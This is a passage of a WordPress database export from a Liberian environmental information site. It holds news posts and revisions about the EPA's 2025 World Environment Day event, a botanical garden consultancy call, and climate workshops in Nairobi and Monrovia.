recovery, recycling, and carbon emission reduction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the formal program marking the celebration, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the EPA, said World Environment Day is not just a time to celebrate but to reflect, strategize, and act in the interest of Liberia and its fragile environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo reminded Liberians that the country is rich in natural resources, including vast rainforests, rivers, and biodiversity. He noted that Liberia is part of the Upper Guinean Forest, a globally significant ecological region that is home to species found nowhere else on Earth.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he warned that this natural wealth is under serious threat. He pointed out illegal mining, logging, water pollution, wetland destruction, unregulated settlement expansion, and irresponsible agricultural practices as activities that are destroying the country’s natural heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are at a point where inaction is no longer an option,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that while the EPA has made progress by implementing policies to combat sea erosion and raise awareness about climate change, much more needs to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, projects like coastal defense, community-based conservation, enforcement of environmental laws, and partnerships with both national and international groups have laid a good foundation. Yet, the journey is far from over.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called on the Liberian Government to take stronger actions. He urged that the EPA, Liberia National Police, and Forestry Development Authority be provided with adequate funding so they can deploy environmental officers and inspectors, especially in remote areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These remote areas are where most illegal logging, mining, and poaching happen. As I speak, the Sapo National Park is under serious threat,” he said. “Without enough resources and trained personnel, we cannot enforce our environmental laws effectively. We need boots on the ground to protect our forests, rivers, and wildlife from exploitation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also stressed that protecting the environment is not the government’s job alone. He said everyone in Liberia, from schools and communities to businesses and civil society organizations, must get involved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Together, we can build a Liberia where future generations can thrive in harmony with nature. On this World Environment Day, let us commit to being stewards of our environment, advocates for change, and guardians of Liberia’s unique natural wealth. The time to act is now,” he concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The keynote speaker of the day was Mr. Aliou Mamadou Dia, UNDP Resident Representative to Liberia, who delivered his address via Zoom from Senegal. He focused his message on the global theme of ending plastic pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Dia emphasized the urgent need for action to end plastic pollution and encouraged Liberians to embrace the Three-Rs: Reduce, Reuse, and Recycle. He said that the environmental crisis is not only a global issue but one that is affecting Liberia directly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He pointed out the specific challenges Liberia faces due to plastic waste, including its harmful impact on ecosystems, wildlife, and human health. He also explained how plastic pollution contributes to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Dia encouraged the use of reusable items, the reduction of single-use plastics, and proper disposal of waste. He also promoted sustainable practices like composting, reducing food waste, and using eco-friendly transport options.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed the need for sound government policies and strong community-based efforts to tackle plastic pollution. He highlighted the importance of waste management systems and recycling programs in creating a cleaner Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the program, Atty. Salimatu L. Gilayeneh, UNDP’s Energy and Environment Specialist, read the official World Environment Day message from United Nations Secretary-General António Guterres.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We need an ambitious, credible, and just agreement to end plastic pollution now,” the message stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Secretary-General Guterres said plastic pollution is harming the planet, affecting ecosystems, human health, and the climate. He said that plastic waste is everywhere, from the top of Mount Everest to the depths of the ocean, and even in human bodies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said there is hope, as more people are now aware and taking steps to reduce plastic use. Governments are also beginning to pass laws to limit single-use plastics and improve waste systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But he warned that the world needs to move faster. In August, countries will meet to finalize a new global treaty to end plastic pollution. He urged negotiators to work together and come up with a strong agreement that focuses on the entire life cycle of plastic, supports circular economies, meets the needs of communities, and aligns with global environmental goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Let’s end the scourge of plastic pollution and build a better future for us all. Thank you,” his message concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the 2025 World Environment Day celebration ended, there was a strong call for every Liberian to rise to the challenge. The EPA, UNDP, and international and local partners thanked everyone who made the event a success.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, like many countries, stands at a turning point. With increased public awareness, strong policies, and community actions, there is hope that the country can win the fight against plastic pollution and protect its rich natural environment for generations to come.</p>\n<!-- /wp:paragraph -->','Environmental Protection Agency of Liberia Celebrates 52nd World Environment Day','','publish','open','open','','environmental-protection-agency-of-liberia-celebrates-52nd-world-environment-day','','','2025-07-09 21:35:43','2025-07-09 21:35:43','',0,'https://ekmsliberia.info/?p=5502',50,'post','',0),(5503,38,'2025-07-09 21:34:53','2025-07-09 21:34:53','','WED','','inherit','open','closed','','wed','','','2025-07-09 21:34:53','2025-07-09 21:34:53','',5502,'https://ekmsliberia.info/wp-content/uploads/2025/07/WED.jpeg',0,'attachment','image/jpeg',0),(5504,38,'2025-07-09 21:35:40','2025-07-09 21:35:40','<!-- wp:paragraph -->\n<p>Paynesville, Sunday, June 8, 2025_Environmental Protection Agency (EPA) of Liberia on Thursday, June 5, 2025, joined the rest of the world to celebrate the 52nd World Environment Day at the PaynesvilleCity Hall. This year’s global theme is “Ending Plastic Pollution,” while Liberia adopted a local theme: “Enhance the Three-Rs: Reduce, Reuse, and Recycle.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>World Environment Day was established by a <a></a>resolution adopted by the United Nations General Assembly in 1972. Since then, June 5 each year is observed as a day for governments and citizens across the world to focus attention on the importance of the environment and take actions that promote sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking through a proclamation read by student Yonnah R. Juah, President Joseph N. Boakai said the observance of World Environment Day provides an opportunity to focus global attention on environmental issues and to empower people to take action for sustainable and equitable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President emphasized the need for Liberians to take concrete steps toward ending plastic pollution within their communities. He noted that the responsibility lies with both the government and the citizens to find suitable ways to mitigate environmental pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Boakai called on all individuals living in Liberia to cooperate with the Environmental Protection Agency in executing the programs set aside for the celebration of the day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Statistics from a recent World Bank and EPA report highlight the urgency of the matter. It indicates that each Liberian generates about 0.44 kg of waste per day. Altogether, 1.5 million kg of solid waste is produced across Liberia daily. Unfortunately, 84.4% of this waste is mismanaged, placing Liberia among the worst-ranked countries in Sub-Saharan Africa in terms of waste management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has endorsed the United Nations global plastic treaty resolution at the Fifth United Nations Environment Assembly (UNEA-5), which commits member states to legally-binding actions to reduce plastic pollution. This move signifies the government’s recognition of the crisis and its intent to align with global efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On October 17, 2024, Liberia validated its National Solid Waste Management Policy. The policy aligns with World Bank data and confirms that 64% of all solid waste in the country is illegally dumped. This reinforces the need for urgent action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia faces a serious problem with plastic pollution. Most of the plastic waste ends up in water bodies, farmlands, and marine ecosystems. However, there are growing initiatives by the EPA, the United Nations Development Programme (UNDP), local NGOs, and grassroots organizations. These groups are making meaningful progress in areas like waste recovery, recycling, and carbon emission reduction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the formal program marking the celebration, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the EPA, said World Environment Day is not just a time to celebrate but to reflect, strategize, and act in the interest of Liberia and its fragile environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo reminded Liberians that the country is rich in natural resources, including vast rainforests, rivers, and biodiversity. He noted that Liberia is part of the Upper Guinean Forest, a globally significant ecological region that is home to species found nowhere else on Earth.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he warned that this natural wealth is under serious threat. He pointed out illegal mining, logging, water pollution, wetland destruction, unregulated settlement expansion, and irresponsible agricultural practices as activities that are destroying the country’s natural heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are at a point where inaction is no longer an option,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that while the EPA has made progress by implementing policies to combat sea erosion and raise awareness about climate change, much more needs to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, projects like coastal defense, community-based conservation, enforcement of environmental laws, and partnerships with both national and international groups have laid a good foundation. Yet, the journey is far from over.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called on the Liberian Government to take stronger actions. He urged that the EPA, Liberia National Police, and Forestry Development Authority be provided with adequate funding so they can deploy environmental officers and inspectors, especially in remote areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These remote areas are where most illegal logging, mining, and poaching happen. As I speak, the Sapo National Park is under serious threat,” he said. “Without enough resources and trained personnel, we cannot enforce our environmental laws effectively. We need boots on the ground to protect our forests, rivers, and wildlife from exploitation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also stressed that protecting the environment is not the government’s job alone. He said everyone in Liberia, from schools and communities to businesses and civil society organizations, must get involved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Together, we can build a Liberia where future generations can thrive in harmony with nature. On this World Environment Day, let us commit to being stewards of our environment, advocates for change, and guardians of Liberia’s unique natural wealth. The time to act is now,” he concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The keynote speaker of the day was Mr. Aliou Mamadou Dia, UNDP Resident Representative to Liberia, who delivered his address via Zoom from Senegal. He focused his message on the global theme of ending plastic pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Dia emphasized the urgent need for action to end plastic pollution and encouraged Liberians to embrace the Three-Rs: Reduce, Reuse, and Recycle. He said that the environmental crisis is not only a global issue but one that is affecting Liberia directly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He pointed out the specific challenges Liberia faces due to plastic waste, including its harmful impact on ecosystems, wildlife, and human health. He also explained how plastic pollution contributes to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Dia encouraged the use of reusable items, the reduction of single-use plastics, and proper disposal of waste. He also promoted sustainable practices like composting, reducing food waste, and using eco-friendly transport options.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed the need for sound government policies and strong community-based efforts to tackle plastic pollution. He highlighted the importance of waste management systems and recycling programs in creating a cleaner Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the program, Atty. Salimatu L. Gilayeneh, UNDP’s Energy and Environment Specialist, read the official World Environment Day message from United Nations Secretary-General António Guterres.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We need an ambitious, credible, and just agreement to end plastic pollution now,” the message stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Secretary-General Guterres said plastic pollution is harming the planet, affecting ecosystems, human health, and the climate. He said that plastic waste is everywhere, from the top of Mount Everest to the depths of the ocean, and even in human bodies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said there is hope, as more people are now aware and taking steps to reduce plastic use. Governments are also beginning to pass laws to limit single-use plastics and improve waste systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But he warned that the world needs to move faster. In August, countries will meet to finalize a new global treaty to end plastic pollution. He urged negotiators to work together and come up with a strong agreement that focuses on the entire life cycle of plastic, supports circular economies, meets the needs of communities, and aligns with global environmental goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Let’s end the scourge of plastic pollution and build a better future for us all. Thank you,” his message concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the 2025 World Environment Day celebration ended, there was a strong call for every Liberian to rise to the challenge. The EPA, UNDP, and international and local partners thanked everyone who made the event a success.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, like many countries, stands at a turning point. With increased public awareness, strong policies, and community actions, there is hope that the country can win the fight against plastic pollution and protect its rich natural environment for generations to come.</p>\n<!-- /wp:paragraph -->','Environmental Protection Agency of Liberia Celebrates 52nd World Environment Day','','inherit','closed','closed','','5502-revision-v1','','','2025-07-09 21:35:40','2025-07-09 21:35:40','',5502,'https://ekmsliberia.info/?p=5504',0,'revision','',0),(5507,38,'2025-07-11 15:03:31','2025-07-11 15:03:31','<div><b>BACKGROUND</b></div>\r\n<div>\r\n\r\nLiberia has diverse wildlife, but it is facing a critical threat- the loss of biodiversity. Although for the most part it is due to the economic situation/poverty and cultural habits, but lack of fundamental awareness and education on the importance of biodiversity is responsible. This is lowering ecosystem services and endangering species.\r\n\r\nIt is important to promote public awareness and take positive actions to save some of the important representative plant and animal species. As reported by Aid-Equip USA in April 2023, “Preserving Liberia’s biodiversity is not just an act of conservation; it’s a battle for maintaining the balance of our planet”. This project/program intends to establish a botanical garden and begin a vigorous biodiversity awareness and education starting with secondary schools and the University of Liberia. The botanical garden will be established in Montserrado County at the UL campus in Fendell.\r\n\r\n</div>\r\n<strong>QUALIFICATIONS </strong>\r\n<ul>\r\n 	<li>A registered and tax compliant Liberian Firm/ CSO.</li>\r\n</ul>\r\n<ul>\r\n 	<li>The Firm/ CSO must have more than five to seven (5-7) years of demonstrated experience in performing similar services requested.</li>\r\n 	<li>The Team-lead and members must have expertise or experience in Environmental Science, architecture engineering, forestry, botany, natural resources management, conservation or relevant disciplines.</li>\r\n</ul>\r\nDownload:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/ToR-for-feasibility-study-UL-Botanical-Garden-1.docx\" target=\"_blank\" rel=\"noopener\">HERE</a>\r\n\r\n&nbsp;','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE               REFERENCE NO: EOI NO. EPA/E&E/CON/ICS/003/2025 Feasibility study to establish a Botanical Garden at the University of Liberia, Fendell Campus','','publish','closed','closed','','call-for-expression-of-interest-to-provide-consultancy-service-reference-no-eoi-no-epa-ee-con-ics-003-2025-feasibility-study-to-establish-a-botanical-garden-at-the-university-of-liber','','','2025-07-11 15:03:31','2025-07-11 15:03:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5507',53,'ekms_bulletin','',0),(5508,38,'2025-07-11 14:55:31','2025-07-11 14:55:31','<div><b>BACKGROUND</b></div>\r\n<div>\r\n\r\nLiberia has diverse wildlife, but it is facing a critical threat- the loss of biodiversity. Although for the most part it is due to the economic situation/poverty and cultural habits, but lack of fundamental awareness and education on the importance of biodiversity is responsible. This is lowering ecosystem services and endangering species.\r\n\r\nIt is important to promote public awareness and take positive actions to save some of the important representative plant and animal species. As reported by Aid-Equip USA in April 2023, “Preserving Liberia’s biodiversity is not just an act of conservation; it’s a battle for maintaining the balance of our planet”. This project/program intends to establish a botanical garden and begin a vigorous biodiversity awareness and education starting with secondary schools and the University of Liberia. The botanical garden will be established in Montserrado County at the UL campus in Fendell.\r\n\r\n</div>\r\n<strong>QUALIFICATIONS </strong>\r\n<ul>\r\n 	<li>A registered and tax compliant Liberian Firm/ CSO.</li>\r\n</ul>\r\n<ul>\r\n 	<li>The Firm/ CSO must have more than five to seven (5-7) years of demonstrated experience in performing similar services requested.</li>\r\n 	<li>The Team-lead and members must have expertise or experience in Environmental Science, architecture engineering, forestry, botany, natural resources management, conservation or relevant disciplines.</li>\r\n</ul>\r\n&nbsp;','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE               REFERENCE NO: EOI NO. EPA/E&E/CON/ICS/003/2025 Feasibility study to establish a Botanical Garden at the University of Liberia, Fendell Campus','','inherit','closed','closed','','5507-revision-v1','','','2025-07-11 14:55:31','2025-07-11 14:55:31','',5507,'https://ekmsliberia.info/?p=5508',0,'revision','',0),(5509,38,'2025-07-11 15:00:10','2025-07-11 15:00:10','','ToR for feasibility study - UL Botanical Garden (1)','','inherit','open','closed','','tor-for-feasibility-study-ul-botanical-garden-1','','','2025-07-11 15:00:10','2025-07-11 15:00:10','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/ToR-for-feasibility-study-UL-Botanical-Garden-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5510,38,'2025-07-11 15:03:31','2025-07-11 15:03:31','<div><b>BACKGROUND</b></div>\r\n<div>\r\n\r\nLiberia has diverse wildlife, but it is facing a critical threat- the loss of biodiversity. Although for the most part it is due to the economic situation/poverty and cultural habits, but lack of fundamental awareness and education on the importance of biodiversity is responsible. This is lowering ecosystem services and endangering species.\r\n\r\nIt is important to promote public awareness and take positive actions to save some of the important representative plant and animal species. As reported by Aid-Equip USA in April 2023, “Preserving Liberia’s biodiversity is not just an act of conservation; it’s a battle for maintaining the balance of our planet”. This project/program intends to establish a botanical garden and begin a vigorous biodiversity awareness and education starting with secondary schools and the University of Liberia. The botanical garden will be established in Montserrado County at the UL campus in Fendell.\r\n\r\n</div>\r\n<strong>QUALIFICATIONS </strong>\r\n<ul>\r\n 	<li>A registered and tax compliant Liberian Firm/ CSO.</li>\r\n</ul>\r\n<ul>\r\n 	<li>The Firm/ CSO must have more than five to seven (5-7) years of demonstrated experience in performing similar services requested.</li>\r\n 	<li>The Team-lead and members must have expertise or experience in Environmental Science, architecture engineering, forestry, botany, natural resources management, conservation or relevant disciplines.</li>\r\n</ul>\r\nDownload:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/ToR-for-feasibility-study-UL-Botanical-Garden-1.docx\" target=\"_blank\" rel=\"noopener\">HERE</a>\r\n\r\n&nbsp;','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE               REFERENCE NO: EOI NO. EPA/E&E/CON/ICS/003/2025 Feasibility study to establish a Botanical Garden at the University of Liberia, Fendell Campus','','inherit','closed','closed','','5507-revision-v1','','','2025-07-11 15:03:31','2025-07-11 15:03:31','',5507,'https://ekmsliberia.info/?p=5510',0,'revision','',0),(5512,38,'2025-07-16 22:11:21','2025-07-16 22:11:21','<!-- wp:paragraph -->\n<p>Nairobi, July 16, 2025_Delegates from the Environmental Protection Agency (EPA) of Liberia, has returned home after participating in a major climate change workshop held in Nairobi, Kenya. The event, which ran from June 8 to 11, 2025, focused on strengthening National Adaptation Plans (NAPs) for Least Developed Countries (LDCs) and Small Island Developing States (SIDS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Liberia at the regional workshop were Mr. Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the EPA, and Mr. Teddy Penneku Taylor, Climate Change Assistant. The two delegates joined other experts and country representatives from across Africa to discuss how to improve climate adaptation strategies and increase collaboration among nations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop was organized by the United Nations Framework Convention on Climate Change (UNFCCC) and the United Nations Environment Program (UNEP). Its main goal was to help countries meet the 2025 deadline for submitting their NAPs and to guide them in finding funding and making sure climate plans are included in national development efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the four-day workshop, the Liberian team took part in technical discussions, shared Liberia’s progress in climate planning, and exchanged ideas with other countries. They highlighted Liberia’s recent updates to its NAP, efforts to involve communities in adaptation work, and steps taken to include climate change in government policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia continues to make steady strides in ensuring that climate change adaptation is integrated into our national development agenda,” Mr. Becker said during a discussion session. He emphasized the value of learning from other countries and working together to face climate risks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop also introduced helpful tools to assess climate risks, choose the right adaptation actions, and improve participation from all parts of society. These lessons are expected to support Liberia’s ongoing climate work and help align it with the Sustainable Development Goals (SDGs), the Nationally Determined Contributions (NDCs), and the country’s ARREST Agenda for Prosperity and Development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Nairobi gathering was seen as a key moment in boosting regional cooperation on climate change. The EPA team says they have returned with new energy to push forward Liberia’s adaptation efforts and prepare for the upcoming UN climate summit (COP30), set for November 2025 in Brazil.</p>\n<!-- /wp:paragraph -->','EPA Liberia Team Returns from Key Climate Workshop in Nairob','','publish','open','open','','epa-liberia-team-returns-from-key-climate-workshop-in-nairob','','','2025-07-16 22:11:25','2025-07-16 22:11:25','',0,'https://ekmsliberia.info/?p=5512',49,'post','',0),(5513,38,'2025-07-16 22:11:04','2025-07-16 22:11:04','','WhatsApp Image 2025-07-16 at 16.46.55','','inherit','open','closed','','whatsapp-image-2025-07-16-at-16-46-55','','','2025-07-16 22:11:04','2025-07-16 22:11:04','',5512,'https://ekmsliberia.info/wp-content/uploads/2025/07/WhatsApp-Image-2025-07-16-at-16.46.55.jpeg',0,'attachment','image/jpeg',0),(5514,38,'2025-07-16 22:11:21','2025-07-16 22:11:21','<!-- wp:paragraph -->\n<p>Nairobi, July 16, 2025_Delegates from the Environmental Protection Agency (EPA) of Liberia, has returned home after participating in a major climate change workshop held in Nairobi, Kenya. The event, which ran from June 8 to 11, 2025, focused on strengthening National Adaptation Plans (NAPs) for Least Developed Countries (LDCs) and Small Island Developing States (SIDS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Liberia at the regional workshop were Mr. Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the EPA, and Mr. Teddy Penneku Taylor, Climate Change Assistant. The two delegates joined other experts and country representatives from across Africa to discuss how to improve climate adaptation strategies and increase collaboration among nations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop was organized by the United Nations Framework Convention on Climate Change (UNFCCC) and the United Nations Environment Program (UNEP). Its main goal was to help countries meet the 2025 deadline for submitting their NAPs and to guide them in finding funding and making sure climate plans are included in national development efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the four-day workshop, the Liberian team took part in technical discussions, shared Liberia’s progress in climate planning, and exchanged ideas with other countries. They highlighted Liberia’s recent updates to its NAP, efforts to involve communities in adaptation work, and steps taken to include climate change in government policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia continues to make steady strides in ensuring that climate change adaptation is integrated into our national development agenda,” Mr. Becker said during a discussion session. He emphasized the value of learning from other countries and working together to face climate risks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop also introduced helpful tools to assess climate risks, choose the right adaptation actions, and improve participation from all parts of society. These lessons are expected to support Liberia’s ongoing climate work and help align it with the Sustainable Development Goals (SDGs), the Nationally Determined Contributions (NDCs), and the country’s ARREST Agenda for Prosperity and Development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Nairobi gathering was seen as a key moment in boosting regional cooperation on climate change. The EPA team says they have returned with new energy to push forward Liberia’s adaptation efforts and prepare for the upcoming UN climate summit (COP30), set for November 2025 in Brazil.</p>\n<!-- /wp:paragraph -->','EPA Liberia Team Returns from Key Climate Workshop in Nairob','','inherit','closed','closed','','5512-revision-v1','','','2025-07-16 22:11:21','2025-07-16 22:11:21','',5512,'https://ekmsliberia.info/?p=5514',0,'revision','',0),(5515,38,'2025-07-16 22:21:21','2025-07-16 22:21:21','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – July 16, 2025 – The Environmental Protection Agency Liberia has taken a major step toward enhancing its climate governance and reporting systems through a stakeholder consultation workshop for the second phase of the Capacity-Building Initiative for Transparency (CBIT) Project. The event, held at the Boulevard Hotel in Monrovia, brought together key actors from government ministries and agencies, civil society, development partners, and international organizations to shape the design of the CBIT Phase II project, officially titled “Strengthening the Capacity of Institutions in Liberia to Comply with the Transparency Requirements of the Paris Agreement.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the opening remarks, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency (EPA) of Liberia, emphasized the significance of this phase in moving the country toward a more coordinated and transparent climate data management system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Our focus today is on strengthening the institutions and systems that allow Liberia to meet its transparency obligations under the Paris Agreement,” Dr. Yarkpawolo stated.</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>“The Paris Agreement is not just about reducing emissions, it\'s about trust among nations through transparency. Every country, including Liberia, must be able to collect, manage, and report climate data accurately and regularly.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He highlighted the accomplishments of CBIT Phase I, including the development of basic climate data systems and capacity building among key institutions. However, he stressed that Phase II would go beyond initial activities to establish a strong national framework capable of sustaining long-term reporting across all sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss outlined four major goals for CBIT Phase II:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.⁠ ⁠Improving institutional arrangements for data collection and reporting;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2.⁠ ⁠Strengthening technical capacity across ministries and agencies to report on Liberia’s Nationally Determined Contributions (NDCs);</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>3.⁠ ⁠Making climate data more transparent and accessible;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>4.⁠ ⁠Ensuring gender and social inclusion in climate reporting systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Transparency is no longer just a reporting requirement. It’s a strategic opportunity. The better we report, the better our chances of unlocking critical international support for our development and climate priorities,” Dr. Yarkpawolo added.</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>He also noted the importance of transparency in Liberia’s emerging carbon market policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Mr. Tim Bromficu, Vice President for Africa, Strategy and Delivery at Conservation International (CI), echoed the EPA Executive Director’s sentiments, describing the workshop as a timely and vital gathering.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“This meeting is important; it will strengthen and give more understanding of greenhouse gas,” he said. “I encourage inclusive participation, including women and children, in Liberia’s climate action process.”</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>Mr. Bromficu emphasized CI’s long-term commitment to Liberia, noting that the organization has served as a Global Environment Facility (GEF) implementing partner since 2013. He expressed readiness to continue working alongside the government in advancing national development goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, Hon. Charles Umehai, Deputy Minister for Energy at the Ministry of Mines and Energy, also spoke at the event, underscoring the urgency of action over words in Liberia’s climate journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>⁠“Climate is key for Liberia. We are expecting a positive outcome from this meeting,” Minister Umehai said. “Let’s work the talk and not only talk the talk.”</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>He thanked CI, the EPA, and other stakeholders for fostering cooperation that supports Liberia’s climate and development priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop served as a platform for dialogue on emissions monitoring, adaptation reporting, institutional coordination, and inclusive stakeholder engagement. Participants pledged to support the CBIT process and committed to continuous collaboration as Liberia moves forward in building a resilient, transparent, and climate-smart future.</p>\n<!-- /wp:paragraph -->','EPA Liberia Advances Climate Transparency Commitments Through Stakeholder Consultation Workshop','','publish','open','open','','epa-liberia-advances-climate-transparency-commitments-through-stakeholder-consultation-workshop','','','2025-07-16 22:21:24','2025-07-16 22:21:24','',0,'https://ekmsliberia.info/?p=5515',48,'post','',0),(5516,38,'2025-07-16 22:20:57','2025-07-16 22:20:57','','WhatsApp Image 2025-07-16 at 11.27.53','','inherit','open','closed','','whatsapp-image-2025-07-16-at-11-27-53','','','2025-07-16 22:20:57','2025-07-16 22:20:57','',5515,'https://ekmsliberia.info/wp-content/uploads/2025/07/WhatsApp-Image-2025-07-16-at-11.27.53.jpeg',0,'attachment','image/jpeg',0),(5517,38,'2025-07-16 22:21:21','2025-07-16 